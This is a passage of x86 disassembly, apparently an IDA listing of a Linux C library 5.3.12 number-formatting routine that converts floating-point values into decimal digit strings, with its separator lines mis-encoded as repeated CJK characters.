loc_8053B46 cmp dword ptr [ebx+4], 0 jnz short loc_8053B46 mov [ebp+var_A4], esi mov esi, ebx mov ebx, 4 nop loc_8053B30: ; CODE XREF: sub_8053310+834j add ebx, 4 inc edi mov ecx, [ebp+var_A4] cmp dword ptr [ecx+ebx], 0 jnz short loc_8053B46 cmp dword ptr [esi+ebx], 0 jz short loc_8053B30 loc_8053B46: ; CODE XREF: sub_8053310+7F7j ; sub_8053310+7FFj ... 
mov eax, [ebp+var_1C] shl eax, 2 mov [ebp+var_9C], eax add eax, [ebp+var_2C] add eax, 0FFFFFFFCh bsr edx, [eax] mov ebx, edx xor bl, 1Fh test ebx, ebx jnz loc_8053D88 test edi, edi jle loc_80543D0 mov ecx, [ebp+var_1C] sub ecx, edi mov [ebp+var_9C], ecx cmp ebx, ecx jge loc_8053C75 mov eax, [ebp+var_2C] mov [ebp+var_A4], eax lea edx, ds:0[edi*4] mov [ebp+var_A0], edx xor ebx, ebx lea esi, ds:0[ecx*4] and ecx, 3 mov [ebp+var_9C], ecx jz short loc_8053C0A cmp ecx, 1 jle short loc_8053BE8 cmp ecx, 2 jle short loc_8053BCA add edx, [ebp+var_2C] mov ecx, [edx] mov [eax], ecx add [ebp+var_A0], 4 mov ebx, 4 loc_8053BCA: ; CODE XREF: sub_8053310+8A5j mov eax, [ebp+var_A0] add eax, [ebp+var_2C] mov edx, [eax] mov ecx, [ebp+var_A4] mov [ecx+ebx], edx add [ebp+var_A0], 4 add ebx, 4 loc_8053BE8: ; CODE XREF: sub_8053310+8A0j mov eax, [ebp+var_A0] add eax, [ebp+var_2C] mov edx, [eax] mov ecx, [ebp+var_A4] mov [ecx+ebx], edx add [ebp+var_A0], 4 add ebx, 4 cmp ebx, esi jz short loc_8053C75 loc_8053C0A: ; CODE XREF: sub_8053310+89Bj mov eax, [ebp+var_A4] add eax, ebx mov [ebp+var_A4], eax loc_8053C18: ; CODE XREF: sub_8053310+963j mov edx, [ebp+var_A0] add edx, [ebp+var_2C] mov ecx, [edx] mov eax, [ebp+var_A4] mov [eax], ecx mov edx, [ebp+var_A0] add edx, [ebp+var_2C] mov ecx, [edx+4] mov [eax+4], ecx mov eax, [ebp+var_A0] add eax, [ebp+var_2C] mov edx, [eax+8] mov ecx, [ebp+var_A4] mov [ecx+8], edx mov eax, [ebp+var_A0] add eax, [ebp+var_2C] mov edx, [eax+0Ch] mov [ecx+0Ch], edx add [ebp+var_A0], 10h add ecx, 10h mov [ebp+var_A4], ecx add ebx, 10h cmp ebx, esi jnz short loc_8053C18 loc_8053C75: ; CODE XREF: sub_8053310+86Dj ; sub_8053310+8F8j sub [ebp+var_1C], edi mov ecx, [ebp+var_24] sub ecx, edi mov [ebp+var_9C], ecx test ecx, ecx jle loc_8053D7D mov eax, [ebp+var_20] mov [ebp+var_A4], eax lea edx, ds:0[edi*4] mov [ebp+var_A0], edx xor ebx, ebx lea esi, ds:0[ecx*4] and ecx, 3 mov [ebp+var_9C], ecx jz short loc_8053D12 cmp ecx, 1 jle short loc_8053CF0 cmp ecx, 2 jle short 
loc_8053CD2 add edx, [ebp+var_20] mov ecx, [edx] mov [eax], ecx add [ebp+var_A0], 4 mov ebx, 4 loc_8053CD2: ; CODE XREF: sub_8053310+9ADj mov eax, [ebp+var_A0] add eax, [ebp+var_20] mov edx, [eax] mov ecx, [ebp+var_A4] mov [ecx+ebx], edx add [ebp+var_A0], 4 add ebx, 4 loc_8053CF0: ; CODE XREF: sub_8053310+9A8j mov eax, [ebp+var_A0] add eax, [ebp+var_20] mov edx, [eax] mov ecx, [ebp+var_A4] mov [ecx+ebx], edx add [ebp+var_A0], 4 add ebx, 4 cmp ebx, esi jz short loc_8053D7D loc_8053D12: ; CODE XREF: sub_8053310+9A3j mov eax, [ebp+var_A4] add eax, ebx mov [ebp+var_A4], eax loc_8053D20: ; CODE XREF: sub_8053310+A6Bj mov edx, [ebp+var_A0] add edx, [ebp+var_20] mov ecx, [edx] mov eax, [ebp+var_A4] mov [eax], ecx mov edx, [ebp+var_A0] add edx, [ebp+var_20] mov ecx, [edx+4] mov [eax+4], ecx mov eax, [ebp+var_A0] add eax, [ebp+var_20] mov edx, [eax+8] mov ecx, [ebp+var_A4] mov [ecx+8], edx mov eax, [ebp+var_A0] add eax, [ebp+var_20] mov edx, [eax+0Ch] mov [ecx+0Ch], edx add [ebp+var_A0], 10h add ecx, 10h mov [ebp+var_A4], ecx add ebx, 10h cmp ebx, esi jnz short loc_8053D20 loc_8053D7D: ; CODE XREF: sub_8053310+975j ; sub_8053310+A00j sub [ebp+var_24], edi jmp loc_80543D0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8053D88: ; CODE XREF: sub_8053310+852j lea esi, ds:0[edi*4] mov ecx, [ebp+var_2C] mov [ebp+var_A4], ecx cmp dword ptr [ecx+esi], 0 jz short loc_8053DC8 bsf eax, [ecx+esi] mov [ebp+var_A0], eax mov edx, [ebp+var_20] mov [ebp+var_A4], edx cmp dword ptr [edx+esi], 0 jz short loc_8053DDC bsf esi, [edx+esi] cmp esi, eax jge short loc_8053DDC mov [ebp+var_A0], esi jmp short loc_8053DDC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8053DC8: ; CODE XREF: sub_8053310+A8Cj lea ecx, ds:0[edi*4] mov eax, [ebp+var_20] bsf eax, [eax+ecx] mov [ebp+var_A0], eax loc_8053DDC: ; CODE XREF: sub_8053310+AA5j ; sub_8053310+AADj ... 
test edi, edi jnz short loc_8053E38 mov eax, 20h sub eax, ebx cmp [ebp+var_A0], eax jge short loc_8053E47 push ebx mov eax, [ebp+var_1C] push eax mov eax, [ebp+var_2C] push eax push eax call sub_8058710 push ebx mov eax, [ebp+var_24] push eax mov eax, [ebp+var_20] push eax push eax call sub_8058710 mov ebx, eax mov [ebp+var_28], ebx add esp, 20h test ebx, ebx jz loc_80543D0 mov edx, [ebp+var_24] shl edx, 2 mov [ebp+var_A0], edx mov ecx, [ebp+var_20] mov [ecx+edx], ebx inc [ebp+var_24] jmp loc_80543D0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8053E38: ; CODE XREF: sub_8053310+ACEj mov eax, 20h sub eax, ebx cmp [ebp+var_A0], eax jl short loc_8053EA4 loc_8053E47: ; CODE XREF: sub_8053310+ADDj mov esi, 20h sub esi, ebx push esi mov eax, [ebp+var_1C] sub eax, edi push eax lea ebx, ds:0[edi*4] mov eax, ebx add eax, [ebp+var_2C] push eax mov eax, [ebp+var_2C] push eax call sub_8059FB0 mov eax, [ebp+var_1C] dec eax sub eax, edi mov [ebp+var_1C], eax push esi mov eax, [ebp+var_24] sub eax, edi push eax add ebx, [ebp+var_20] push ebx mov eax, [ebp+var_20] push eax call sub_8059FB0 add esp, 20h mov eax, [ebp+var_24] sub eax, edi shl eax, 2 add eax, [ebp+var_20] cmp dword ptr [eax-4], 0 jnz short loc_8053EFC mov ebx, [ebp+var_24] dec ebx jmp short loc_8053EFF ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8053EA4: ; CODE XREF: sub_8053310+B35j mov esi, 20h sub esi, ebx push esi mov eax, [ebp+var_1C] inc eax sub eax, edi push eax lea ebx, ds:0FFFFFFFCh[edi*4] mov eax, ebx add eax, [ebp+var_2C] push eax mov eax, [ebp+var_2C] push eax call sub_8059FB0 sub [ebp+var_1C], edi push esi mov eax, [ebp+var_24] inc eax sub eax, edi push eax add ebx, [ebp+var_20] push ebx mov eax, [ebp+var_20] push eax call sub_8059FB0 add esp, 20h mov eax, [ebp+var_24] inc eax mov ebx, eax sub ebx, edi lea eax, ds:0[ebx*4] add eax, [ebp+var_20] cmp dword ptr [eax-4], 0 jnz short loc_8053F01 loc_8053EFC: ; CODE XREF: sub_8053310+B8Aj mov ebx, 
[ebp+var_24] loc_8053EFF: ; CODE XREF: sub_8053310+B90j sub ebx, edi loc_8053F01: ; CODE XREF: sub_8053310+BEAj mov [ebp+var_24], ebx jmp loc_80543D0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8053F0C: ; CODE XREF: sub_8053310+3EDj cmp [ebp+var_18], 0 jge loc_8054394 mov [ebp+var_6C], 0 mov [ebp+var_70], 0Ch mov [ebp+var_74], offset a@TheLinuxCLibr ; "@(#) The Linux C library 5.3.12" mov eax, [ebp+var_58] push eax mov edx, [ebp+var_24] push edx lea ecx, [ebp+var_44] push ecx mov eax, [ebp+var_20] push eax call sub_8058710 mov ebx, eax mov [ebp+var_28], ebx mov edx, [ebp+var_24] shl edx, 2 mov [ebp+var_A0], edx mov ecx, [ebp+var_20] mov [ecx+edx], ebx inc [ebp+var_24] mov [ebp+var_10], 1 neg [ebp+var_18] add esp, 10h mov [ebp+var_98], 8068E80h db 8Dh,76h,0 ; lea esi, [esi+0] loc_8053F74: ; CODE XREF: sub_8053310+FD6j add [ebp+var_98], 0FFFFFFF0h add [ebp+var_74], 0FFFFFFF0h mov edx, [ebp+var_18] mov eax, [ebp+var_98] cmp [eax+8], edx jg loc_80542D6 mov ebx, [eax] add ebx, 0FFFFFFFEh cmp [ebp+var_24], ebx jge short loc_8053FB4 mov ecx, [ebp+var_24] push ecx mov eax, [ebp+var_20] push eax push ebx mov edx, [ebp+var_74] mov edx, [edx] add edx, 8 push edx mov ecx, [ebp+var_30] push ecx jmp short loc_8053FD5 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8053FB4: ; CODE XREF: sub_8053310+C89j mov eax, [ebp+var_98] mov eax, [eax] add eax, 0FFFFFFFEh push eax mov edx, [ebp+var_74] mov edx, [edx] add edx, 8 push edx mov ecx, [ebp+var_24] push ecx mov eax, [ebp+var_20] push eax mov edx, [ebp+var_30] push edx loc_8053FD5: ; CODE XREF: sub_8053310+CA1j call sub_805876C mov ebx, eax mov [ebp+var_28], ebx add esp, 14h mov ebx, [ebp+var_24] mov ecx, [ebp+var_98] add ebx, [ecx] add ebx, 0FFFFFFFEh cmp [ebp+var_28], 0 jnz short loc_8053FF7 dec ebx loc_8053FF7: ; CODE XREF: sub_8053310+CE4j lea eax, ds:0[ebx*4] add eax, [ebp+var_30] add eax, 0FFFFFFFCh bsr eax, [eax] mov esi, eax xor esi, 1Fh mov edi, ebx sub edi, 
[ebp+var_24] mov edx, edi shl edx, 5 lea eax, [esi-1Fh] mov edi, edx sub edi, eax mov eax, [ebp+var_18] add eax, 3 cmp edi, eax jnz short loc_805406D cmp esi, 1Ch jg short loc_8054048 mov [ebp+var_4C], 0 mov eax, 1Ch sub eax, esi mov ecx, eax mov eax, 0Ah shl eax, cl mov [ebp+var_48], eax jmp short loc_805406D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054048: ; CODE XREF: sub_8053310+D1Aj mov [ebp+var_4C], 0A0000000h mov [ebp+var_48], 0 mov eax, 20h sub eax, esi push eax push 2 lea eax, [ebp+var_4C] push eax push eax call sub_8058710 add esp, 10h loc_805406D: ; CODE XREF: sub_8053310+D15j ; sub_8053310+D36j mov edx, [ebp+var_18] add edx, 3 mov [ebp+var_A4], edx cmp edi, edx jl short loc_80540B3 jnz loc_80542D6 lea ecx, ds:0[ebx*4] add ecx, [ebp+var_30] mov [ebp+var_A4], ecx mov eax, [ecx-4] mov [ebp+var_A0], eax cmp [ebp+var_48], eax ja short loc_80540B3 jnz loc_80542D6 mov edx, [ecx-8] cmp [ebp+var_4C], edx jbe loc_80542D6 loc_80540B3: ; CODE XREF: sub_8053310+D6Bj ; sub_8053310+D8Fj sub [ebp+var_18], edi mov eax, 1 mov ecx, [ebp+var_70] shl eax, cl or [ebp+var_6C], eax cmp [ebp+var_18], 0 jge short loc_80540CC sub esi, [ebp+var_18] loc_80540CC: ; CODE XREF: sub_8053310+DB7j xor edi, edi mov eax, [ebp+var_30] mov [ebp+var_A4], eax cmp dword ptr [eax], 0 jnz short loc_8054106 mov [ebp+var_A0], eax mov [ebp+var_A4], 0 loc_80540EC: ; CODE XREF: sub_8053310+DF4j add [ebp+var_A4], 4 inc edi mov edx, [ebp+var_A4] mov ecx, [ebp+var_A0] cmp dword ptr [ecx+edx], 0 jz short loc_80540EC loc_8054106: ; CODE XREF: sub_8053310+DCAj cmp esi, 1Fh jnz loc_8054234 mov eax, ebx sub eax, edi mov [ebp+var_9C], eax test eax, eax jle loc_8054229 mov edx, [ebp+var_20] mov [ebp+var_A4], edx lea ecx, ds:0[edi*4] mov [ebp+var_A0], ecx xor esi, esi shl eax, 2 mov [ebp+var_94], eax mov edx, [ebp+var_9C] and edx, 3 mov [ebp+var_9C], edx jz short loc_80541BA cmp edx, 1 jle short loc_8054194 cmp edx, 2 jle short loc_8054176 add ecx, [ebp+var_30] mov ecx, [ecx] mov eax, [ebp+var_A4] mov [eax], 
ecx add [ebp+var_A0], 4 mov esi, 4 loc_8054176: ; CODE XREF: sub_8053310+E4Bj mov edx, [ebp+var_A0] add edx, [ebp+var_30] mov ecx, [edx] mov eax, [ebp+var_A4] mov [eax+esi], ecx add [ebp+var_A0], 4 add esi, 4 loc_8054194: ; CODE XREF: sub_8053310+E46j mov edx, [ebp+var_A0] add edx, [ebp+var_30] mov ecx, [edx] mov eax, [ebp+var_A4] mov [eax+esi], ecx add [ebp+var_A0], 4 add esi, 4 cmp [ebp+var_94], esi jz short loc_8054229 loc_80541BA: ; CODE XREF: sub_8053310+E41j mov edx, [ebp+var_A4] add edx, esi mov [ebp+var_A4], edx loc_80541C8: ; CODE XREF: sub_8053310+F17j mov ecx, [ebp+var_A0] add ecx, [ebp+var_30] mov eax, [ecx] mov edx, [ebp+var_A4] mov [edx], eax mov ecx, [ebp+var_A0] add ecx, [ebp+var_30] mov eax, [ecx+4] mov [edx+4], eax mov edx, [ebp+var_A0] add edx, [ebp+var_30] mov ecx, [edx+8] mov eax, [ebp+var_A4] mov [eax+8], ecx mov edx, [ebp+var_A0] add edx, [ebp+var_30] mov ecx, [edx+0Ch] mov [eax+0Ch], ecx add [ebp+var_A0], 10h add eax, 10h mov [ebp+var_A4], eax add esi, 10h cmp [ebp+var_94], esi jnz short loc_80541C8 loc_8054229: ; CODE XREF: sub_8053310+E0Bj ; sub_8053310+EA8j sub ebx, edi mov [ebp+var_24], ebx jmp loc_80542D6 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8054234: ; CODE XREF: sub_8053310+DF9j lea eax, ds:0[edi*4] mov edx, [ebp+var_30] mov [ebp+var_A4], edx bsf ecx, [edx+eax] mov [ebp+var_A0], ecx test edi, edi jnz short loc_805428C mov eax, 1Fh sub eax, esi cmp eax, ecx jle short loc_805429B inc esi mov [ebp+var_9C], esi push esi push ebx push edx mov eax, [ebp+var_20] push eax call sub_8058710 mov esi, eax mov [ebp+var_28], esi lea edx, [ebx+1] mov [ebp+var_24], edx lea ebx, ds:4[ebx*4] mov ecx, ebx add ecx, [ebp+var_20] mov [ecx-4], esi jmp short loc_80542D3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805428C: ; CODE XREF: sub_8053310+F40j mov eax, 1Fh sub eax, esi cmp [ebp+var_A0], eax jl short loc_80542B0 loc_805429B: ; CODE XREF: sub_8053310+F4Bj mov eax, 1Fh sub eax, esi push eax sub ebx, edi push ebx lea eax, ds:0[edi*4] jmp 
short loc_80542C3 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_80542B0: ; CODE XREF: sub_8053310+F89j mov eax, 1Fh sub eax, esi push eax inc ebx sub ebx, edi push ebx lea eax, ds:0FFFFFFFCh[edi*4] loc_80542C3: ; CODE XREF: sub_8053310+F9Dj add eax, [ebp+var_30] push eax mov eax, [ebp+var_20] push eax call sub_8059FB0 mov [ebp+var_24], ebx loc_80542D3: ; CODE XREF: sub_8053310+F7Aj add esp, 10h loc_80542D6: ; CODE XREF: sub_8053310+C7Bj ; sub_8053310+D6Dj ... dec [ebp+var_70] cmp [ebp+var_74], offset off_8068DBC jz short loc_80542EC cmp [ebp+var_18], 0 jg loc_8053F74 loc_80542EC: ; CODE XREF: sub_8053310+FD0j cmp [ebp+var_18], 0 jle loc_805438B push 0Ah mov eax, [ebp+var_24] push eax mov eax, [ebp+var_20] push eax mov eax, [ebp+var_30] push eax call sub_8058DE0 mov [ebp+var_28], eax mov ebx, [ebp+var_24] mov eax, [ebp+var_30] bsf esi, [eax] add esp, 10h cmp [ebp+var_18], 4 jg short loc_8054328 cmp [ebp+var_18], esi jg short loc_805432D jmp short loc_8054364 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054328: ; CODE XREF: sub_8053310+100Cj cmp esi, 3 jg short loc_8054364 loc_805432D: ; CODE XREF: sub_8053310+1011j mov esi, 1Ch cmp [ebp+var_18], 4 jg short loc_8054340 mov esi, 20h sub esi, [ebp+var_18] loc_8054340: ; CODE XREF: sub_8053310+1026j push esi push ebx mov eax, [ebp+var_30] push eax mov eax, [ebp+var_20] push eax call sub_8058710 mov esi, eax mov [ebp+var_28], esi add esp, 10h test esi, esi jz short loc_8054384 mov eax, [ebp+var_20] mov [eax+ebx*4], esi inc ebx jmp short loc_8054384 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054364: ; CODE XREF: sub_8053310+1013j ; sub_8053310+101Bj mov esi, 4 cmp [ebp+var_18], 4 jg short loc_8054372 mov esi, [ebp+var_18] loc_8054372: ; CODE XREF: sub_8053310+105Dj push esi push ebx mov eax, [ebp+var_30] push eax mov eax, [ebp+var_20] push eax call sub_8059FB0 add esp, 10h loc_8054384: ; CODE XREF: sub_8053310+1049j ; sub_8053310+1052j mov [ebp+var_24], ebx or 
byte ptr [ebp+var_6C], 1 loc_805438B: ; CODE XREF: sub_8053310+FE0j mov eax, [ebp+var_6C] mov [ebp+var_18], eax jmp short loc_80543D0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8054394: ; CODE XREF: sub_8053310+C00j mov edx, [ebp+var_58] add edx, [ebp+var_18] push edx mov ecx, [ebp+var_24] push ecx lea eax, [ebp+var_44] push eax mov edx, [ebp+var_20] push edx call sub_8058710 mov ebx, eax mov [ebp+var_28], ebx mov ecx, [ebp+var_24] shl ecx, 2 mov [ebp+var_A0], ecx mov eax, [ebp+var_20] mov [eax+ecx], ebx inc [ebp+var_24] mov [ebp+var_18], 0 add esp, 10h loc_80543D0: ; CODE XREF: sub_8053310+7E9j ; sub_8053310+85Aj ... mov edx, [ebp+arg_4] mov edx, [edx+4] mov [ebp+var_78], edx mov [ebp+var_80], 0 mov [ebp+var_88], 0 mov ecx, [ebp+arg_4] movzx ebx, byte ptr [ecx+8] mov eax, dword_8078FA4 cmp dword ptr [eax+ebx*4], 65h jnz short loc_8054420 mov [ebp+var_14], ebx mov [ebp+var_7C], 1 mov esi, [ecx] test esi, esi jge short loc_8054411 mov esi, 6 loc_8054411: ; CODE XREF: sub_8053310+10FAj mov [ebp+var_84], esi mov ebx, esi add ebx, 8 jmp short loc_8054466 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054420: ; CODE XREF: sub_8053310+10EAj mov edx, [ebp+arg_4] cmp byte ptr [edx+8], 66h jnz short loc_8054480 mov [ebp+var_14], 66h mov esi, [edx] test esi, esi jge short loc_805443B mov esi, 6 loc_805443B: ; CODE XREF: sub_8053310+1124j mov [ebp+var_84], esi cmp [ebp+var_10], 0 jnz short loc_805445C mov ecx, [ebp+var_18] inc ecx mov [ebp+var_7C], ecx mov eax, esi add eax, 2 mov ebx, eax add ebx, [ebp+var_18] jmp short loc_8054466 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805445C: ; CODE XREF: sub_8053310+1135j mov [ebp+var_7C], 1 lea ebx, [esi+2] loc_8054466: ; CODE XREF: sub_8053310+110Cj ; sub_8053310+1148j mov [ebp+var_8C], 7FFFFFFFh mov [ebp+var_90], 1 jmp loc_8054550 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8054480: ; CODE XREF: sub_8053310+1117j 
mov edx, [ebp+arg_4] cmp dword ptr [edx], 0 jl short loc_80544A0 mov ecx, [edx] mov [ebp+var_8C], ecx test ecx, ecx jnz short loc_80544AA mov [ebp+var_8C], 1 jmp short loc_80544AA ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80544A0: ; CODE XREF: sub_8053310+1176j mov [ebp+var_8C], 6 loc_80544AA: ; CODE XREF: sub_8053310+1182j ; sub_8053310+118Ej cmp [ebp+var_10], 0 jnz short loc_80544C0 mov eax, [ebp+var_8C] cmp [ebp+var_18], eax jge short loc_80544C6 jmp short loc_8054500 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80544C0: ; CODE XREF: sub_8053310+119Ej cmp [ebp+var_18], 4 jle short loc_8054500 loc_80544C6: ; CODE XREF: sub_8053310+11A9j mov edx, [ebp+arg_4] movzx edx, byte ptr [edx+8] mov ebx, 65h mov ecx, dword_8078FA0 test byte ptr [ecx+edx*2+1], 1 jz short loc_80544E4 mov ebx, 45h loc_80544E4: ; CODE XREF: sub_8053310+11CDj mov [ebp+var_14], ebx mov esi, [ebp+var_8C] dec esi mov [ebp+var_7C], 1 mov ebx, [ebp+var_8C] add ebx, 7 jmp short loc_805452D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054500: ; CODE XREF: sub_8053310+11ABj ; sub_8053310+11B4j mov [ebp+var_14], 66h mov [ebp+var_7C], 0 cmp [ebp+var_10], 0 jnz short loc_805451B mov eax, [ebp+var_18] inc eax mov [ebp+var_7C], eax loc_805451B: ; CODE XREF: sub_8053310+1202j mov esi, [ebp+var_8C] sub esi, [ebp+var_7C] mov ebx, [ebp+var_8C] add ebx, ebx inc ebx loc_805452D: ; CODE XREF: sub_8053310+11EEj mov [ebp+var_84], 0 mov edx, [ebp+arg_4] cmp dword ptr [edx+18h], 0 jz short loc_8054546 mov [ebp+var_84], esi loc_8054546: ; CODE XREF: sub_8053310+122Ej mov [ebp+var_90], 0 loc_8054550: ; CODE XREF: sub_8053310+116Aj cmp [ebp+var_50], 0 jz short loc_805456E mov ecx, [ebp+var_38] push ecx mov eax, [ebp+var_50] push eax mov edx, [ebp+var_7C] push edx call sub_8054C28 mov edi, eax add ebx, edi add esp, 0Ch loc_805456E: ; CODE XREF: sub_8053310+1244j lea eax, [ebx+5] and al, 0FCh sub esp, eax lea edi, [esp+164h+var_162] mov ebx, edi cmp [ebp+var_10], 0 jz 
short loc_805458B cmp [ebp+var_14], 66h jz loc_8054644 loc_805458B: ; CODE XREF: sub_8053310+126Fj mov ecx, [ebp+var_7C] cmp [ebp+var_80], ecx jge short loc_8054612 mov eax, ecx sub eax, [ebp+var_80] and eax, 3 mov [ebp+var_A4], eax jz short loc_80545DC cmp eax, 1 jle short loc_80545C7 cmp eax, 2 jle short loc_80545BA inc [ebp+var_80] mov ecx, ebp call sub_80531DC mov [ebx], al inc ebx loc_80545BA: ; CODE XREF: sub_8053310+129Bj inc [ebp+var_80] mov ecx, ebp call sub_80531DC mov [ebx], al inc ebx loc_80545C7: ; CODE XREF: sub_8053310+1296j inc [ebp+var_80] mov ecx, ebp call sub_80531DC mov [ebx], al inc ebx mov eax, [ebp+var_7C] cmp [ebp+var_80], eax jge short loc_8054612 loc_80545DC: ; CODE XREF: sub_8053310+1291j ; sub_8053310+1300j mov ecx, ebp call sub_80531DC mov [ebx], al mov ecx, ebp call sub_80531DC mov [ebx+1], al mov ecx, ebp call sub_80531DC mov [ebx+2], al add [ebp+var_80], 4 mov ecx, ebp call sub_80531DC mov [ebx+3], al add ebx, 4 mov edx, [ebp+var_7C] cmp [ebp+var_80], edx jl short loc_80545DC loc_8054612: ; CODE XREF: sub_8053310+1281j ; sub_8053310+12CAj mov [ebp+var_90], 1 mov ecx, [ebp+arg_4] cmp dword ptr [ecx+18h], 0 jnz short loc_805464B cmp [ebp+var_84], 0 jg short loc_805464B test esi, esi jle short loc_8054651 cmp [ebp+var_24], 1 jg short loc_805464B mov eax, [ebp+var_20] cmp dword ptr [eax], 0 jz short loc_8054651 jmp short loc_805464B ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054644: ; CODE XREF: sub_8053310+1275j mov byte ptr [ebx], 30h inc ebx dec [ebp+var_18] loc_805464B: ; CODE XREF: sub_8053310+1313j ; sub_8053310+131Cj ... 
mov al, byte ptr [ebp+var_34] mov [ebx], al inc ebx loc_8054651: ; CODE XREF: sub_8053310+1320j ; sub_8053310+132Ej mov eax, [ebp+var_84] cmp [ebp+var_88], eax jl short loc_8054676 cmp [ebp+var_88], esi jge short loc_80546C8 nop loc_8054668: ; CODE XREF: sub_8053310+13B6j cmp [ebp+var_24], 1 jg short loc_8054676 mov eax, [ebp+var_20] cmp dword ptr [eax], 0 jz short loc_80546C8 loc_8054676: ; CODE XREF: sub_8053310+134Dj ; sub_8053310+135Cj ... inc [ebp+var_88] mov ecx, ebp call sub_80531DC mov [ebx], al cmp al, 30h jz short loc_8054698 mov [ebp+var_90], 1 jmp short loc_80546B1 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8054698: ; CODE XREF: sub_8053310+1377j cmp [ebp+var_90], 0 jnz short loc_80546B1 inc esi cmp [ebp+var_84], 0 jle short loc_80546B1 inc [ebp+var_84] loc_80546B1: ; CODE XREF: sub_8053310+1383j ; sub_8053310+138Fj ... inc ebx mov edx, [ebp+var_84] cmp [ebp+var_88], edx jl short loc_8054676 cmp [ebp+var_88], esi jl short loc_8054668 loc_80546C8: ; CODE XREF: sub_8053310+1355j ; sub_8053310+1364j mov ecx, ebp call sub_80531DC movzx esi, al cmp esi, 34h jle loc_8054914 mov [ebp+var_A4], ebx cmp esi, 35h jnz short loc_80546FE cmp [ebp+var_24], 1 jnz short loc_80546FE mov eax, [ebp+var_20] cmp dword ptr [eax], 0 jnz short loc_80546FE test byte ptr [ebx-1], 1 jz loc_8054914 loc_80546FE: ; CODE XREF: sub_8053310+13D4j ; sub_8053310+13DAj ... 
